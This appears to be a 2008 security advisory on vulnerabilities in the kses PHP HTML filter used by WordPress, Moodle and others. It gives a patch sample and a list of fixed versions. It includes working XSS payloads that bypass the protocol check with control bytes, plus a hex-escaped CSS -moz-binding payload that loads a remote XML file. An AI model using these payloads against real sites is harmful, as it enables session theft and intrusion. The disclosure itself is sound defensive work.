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HistoryApr 03, 2008 - 12:00 a.m.

Vulnerabilities in kses-based HTML filters


Vulnerabilities in kses-based HTML filters

During internal code review performed by, some weaknesses
were discovered in kses - PHP HTML/XHTML filter. HTML filters using or
based on kses are part of many popular projects, including WordPress,
Moodle, Drupal, eGroupWare, Dokeos, PHP-Nuke, Geeklog and others. Issues
found range from cross-site scripting to code execution, depending on

Kses filters HTML by whitelisting allowed tags, attributes, and
protocols in attribute values. Additionally, it normalizes HTML entities
and performs a few blacklist checks. This approach makes it much more
reliable as a defence against XSS than a typical blacklist filter. Kses
is no longer mantained since 2005, and multiple projects that use it
developed their own versions. In most cases, these implementations share
the same vulnerabilites.

Quote from kses code:
function kses_bad_protocol_once($string, $allowed_protocols)

This function searches for URL protocols at the beginning of $string, while

handling whitespace and HTML entities.

return preg_replace('/^((&[^;];|[\sA-Za-z0-9]))'.
'kses_bad_protocol_once2("\\1", $allowed_protocols)',
} # function kses_bad_protocol_once

  1. PHP code execution
    This vulnerability is caused by unsafe preg_replace() with "e" modifier
    and backreference between double quotes. It's exploitable if kses
    attribute cleaning functions are called without previous entities
    normalization. This is not a standard way of using kses, but such
    implementations exist in widely deployed software.
    — stripped —

  2. Cross site scripting - protocol checks bypass
    This vulnerability is caused by insufficient protocol checks in
    attribute values. By injecting byte 08 (Firefox) or 0B (Opera) at the
    beginning of attribute value, it is possible to bypass
    kses_bad_protocol_once2() call.
    Examples (partially urlencoded for readability):
    (Opera) <img src="%0Bjavascript:alert(document.domain)">
    (Firefox) <a href='%08data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>

  3. Cross site scripting - allowed attributes
    In some implementations, style attribute is allowed. As kses is not
    designed to deal with XSS inside CSS, such configurations are
    vulnerable, unless additional checks are added. In reality, code added
    for cleaning CSS usually does not solve this problem in sufficient
    (Firefox) <a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67: \75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\65\72\73\2E\6F\72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73\73)" href="">test</a>


Sample quick-fix for 1 and (assuming previous entities normalization) 2:
function kses_bad_protocol_once($string, $allowed_protocols)

This function searches for URL protocols at the beginning of $string, while

handling whitespace and HTML entities.

$string2 = preg_split('/:|:|:/i', $string, 2);
if(isset($string2[1]) && !preg_match('%/\?%',$string2[0]))
$string = kses_bad_protocol_once2($string2[0],$allowed_protocols)
return $string;
} # function kses_bad_protocol_once

Another option would be to change HTML filter and use some actively
supported library. There are two such filters with kses compatibility

HTML Purifier has an advantage of proper CSS validation and secure
default settings, so it's a preferred solution.

Fixed software

Dokeos 1.8.4 SP3,
eGroupWare 1.4.003,
WordPress 2.5,
Moodle 1.9,

Lukasz Pilorz,